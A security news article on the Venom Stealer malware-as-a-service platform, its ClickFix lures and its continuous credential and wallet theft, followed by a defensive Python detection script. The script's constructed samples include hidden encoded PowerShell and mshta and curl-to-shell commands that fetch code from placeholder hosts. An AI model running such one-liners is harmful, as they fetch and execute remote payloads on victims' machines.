New Venom Stealer MaaS Platform Automates Continuous Data Theft


A new malware-as-a-service (MaaS) platform dubbed Venom Stealer that automates credential theft and continuous data exfiltration has been identified by cybersecurity researchers.

The platform is being sold on cybercrime networks and is designed to go beyond traditional credential harvesting tools: instead of collecting data once and exiting, it keeps running after the initial infection and continues to collect and exfiltrate new data as it appears.

Integrating ClickFix Into Venom Stealer

According to a new advisory published by BlackFog researchers on March 31, Venom Stealer includes the integration of ClickFix social engineering directly into its operator panel, allowing attackers to automate the entire attack chain from infection to data theft.

The platform operates on a subscription model ranging from $250 per month to $1,800 for lifetime access, and includes Telegram-based licensing and an affiliate program.

The infection process begins when a victim lands on a fake webpage that mimics a Cloudflare CAPTCHA check, an OS update prompt, an SSL certificate error or a font installation page. The page instructs the victim to open the Run dialog (Windows) or a Terminal (macOS), paste a command and execute it themselves. Because the victim types the command, the resulting process chain looks user-initiated, with a script host spawned from an interactive shell rather than from a downloaded file, which helps it slip past controls focused on malicious attachments and downloads.

Once executed, the malware extracts saved passwords, session cookies, browsing history, autofill data and cryptocurrency wallet information from Chromium and Firefox-based browsers. The malware also performs system fingerprinting and collects browser extension data, creating a detailed profile of the infected system.


Continuous Exfiltration and Crypto Theft

Unlike traditional infostealers that run once and exit, Venom Stealer remains active and continuously monitors Chrome's login database (the Login Data file) to capture newly saved credentials in real time. This undermines credential rotation as a response strategy: a password changed on a still-infected host is captured as soon as the browser saves it, so the implant must be removed before rotation does any good, and the window during which data can be stolen extends for as long as the malware runs.

If cryptocurrency wallet files are found, they are sent to a server-side cracking engine running on GPU infrastructure that attempts to recover the wallet password. Once a wallet is cracked, funds are automatically swept across multiple blockchain networks, including tokens and decentralized finance positions.

Key capabilities of the malware include:

  • Automated ClickFix delivery templates for Windows and macOS

  • Continuous credential monitoring after infection

  • Cryptocurrency wallet cracking and automatic fund transfers

  • File system search for seed phrases and password files

BlackFog said the attack chain can be disrupted by restricting PowerShell execution, disabling the Run dialog for standard users and training employees to recognize ClickFix-style social engineering attempts. In practice that means application control (AppLocker or WDAC) or Constrained Language Mode rather than the PowerShell execution policy, which is not a security boundary, and the "Remove Run menu from Start Menu" group policy, which also disables Win+R. Monitoring outbound network traffic is also important, as the malware relies on immediate data exfiltration to attacker-controlled servers.
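The infection chain described above (Run dialog or Terminal, pasted command, script host) leaves a distinctive parent/child relationship in endpoint telemetry, and BlackFog's mitigation list ends with monitoring. The following detection logic is an added example for this article, not code from BlackFog or from the Venom Stealer kit. It assumes process-creation events shaped like Sysmon Event ID 1 (ParentImage, Image, CommandLine, Computer, User); the sample events, the RunMRU values and the macOS image names are constructed. It flags script hosts launched from explorer.exe (which hosts the Run dialog) or a terminal whose command line carries traits typical of pasted ClickFix one-liners, and it triages the Run dialog's own history key as a forensic follow-up.

```python
"""Flag ClickFix-style execution chains in endpoint process telemetry.

Added example for this article; it is not code from BlackFog or from the
Venom Stealer kit. The input shape (Sysmon Event ID 1-like dicts with
ParentImage / Image / CommandLine) and all sample data are constructed.
"""
import re

# The lure tells the victim to open Win+R (hosted by explorer.exe) or a
# macOS terminal and paste a command, so the parent of the script host is
# an interactive shell rather than a service, installer or scheduler.
RUN_DIALOG_PARENTS = {"explorer.exe"}
TERMINAL_PARENTS = {"terminal", "iterm2"}  # assumed names as an EDR might report them
WIN_SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
MAC_SCRIPT_HOSTS = {"bash", "sh", "zsh", "osascript", "curl"}

# Command-line traits common to pasted ClickFix one-liners.
INDICATORS = [
    (re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"), "encoded command"),
    (re.compile(r"(?i)\b(iex|invoke-expression)\b"), "inline script evaluation"),
    (re.compile(r"(?i)downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b"), "remote payload fetch"),
    (re.compile(r"(?i)-w(indowstyle)?\s+hidden"), "hidden window"),
    (re.compile(r"(?i)\bmshta\b.*https?://"), "mshta loading remote HTA"),
    (re.compile(r"(?i)\|\s*(sh|bash|zsh)\b"), "pipe to shell"),
]


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def command_indicators(cmdline: str) -> list[str]:
    """Return the labels of every indicator present in a command line."""
    return [label for pattern, label in INDICATORS if pattern.search(cmdline)]


def is_user_pasted_chain(parent_image: str, image: str) -> bool:
    """True when the script host was spawned from the Run dialog or a terminal."""
    parent, child = _basename(parent_image), _basename(image)
    return (parent in RUN_DIALOG_PARENTS and child in WIN_SCRIPT_HOSTS) or (
        parent in TERMINAL_PARENTS and child in MAC_SCRIPT_HOSTS
    )


def detect_clickfix(events: list[dict]) -> list[dict]:
    """Alert on user-launched script hosts whose command line carries indicators.

    A plain explorer.exe -> powershell.exe with a clean command line is an
    admin opening a shell and is not alerted; a suspicious command line under
    a non-interactive parent belongs to a different rule, not this one.
    """
    alerts = []
    for ev in events:
        if not is_user_pasted_chain(ev["ParentImage"], ev["Image"]):
            continue
        reasons = command_indicators(ev.get("CommandLine", ""))
        if reasons:
            alerts.append({"host": ev["Computer"], "user": ev["User"],
                           "image": _basename(ev["Image"]), "reasons": reasons})
    return alerts


def triage_runmru(values: dict[str, str]) -> list[str]:
    """Forensic follow-up on a suspect host. The Run dialog keeps its history
    under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU:
    each value is '<command>\\1' and MRUList orders them, most recent first.
    Returns the commands that carry ClickFix indicators in that order."""
    hits = []
    for key in values.get("MRUList", ""):
        cmd = values.get(key, "").removesuffix("\\1")
        if command_indicators(cmd):
            hits.append(cmd)
    return hits


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    {"Computer": "WS01", "User": "CORP\\alice", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA="},
    {"Computer": "WS01", "User": "CORP\\admin", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"Computer": "WS02", "User": "CORP\\bob", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://captcha.example.invalid/verify.hta"},
    {"Computer": "MAC01", "User": "carol",
     "ParentImage": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "Image": "/bin/bash",
     "CommandLine": 'bash -c "curl -fsSL https://update.example.invalid/fix | sh"'},
    {"Computer": "WS03", "User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA="},
]

# Constructed RunMRU values as exported from the registry (not a real capture).
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA=\\1",
}

if __name__ == "__main__":
    for alert in detect_clickfix(SAMPLE_EVENTS):
        print(alert)
    print(triage_runmru(SAMPLE_RUNMRU))
```

Of the five constructed events, three alert: the hidden, encoded PowerShell under explorer.exe, the mshta call fetching a remote HTA, and the curl-piped-to-sh under Terminal. The admin's bare `powershell.exe` does not, and the encoded PowerShell under svchost.exe is deliberately left to a separate rule, because the point of this one is the interactive parent that ClickFix produces. The RunMRU triage is worth running on any host that alerts, since the pasted command often survives there after the process telemetry has rolled over.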

The research indicated that the platform is actively maintained, with multiple updates released in March 2026, suggesting a full-time development operation.
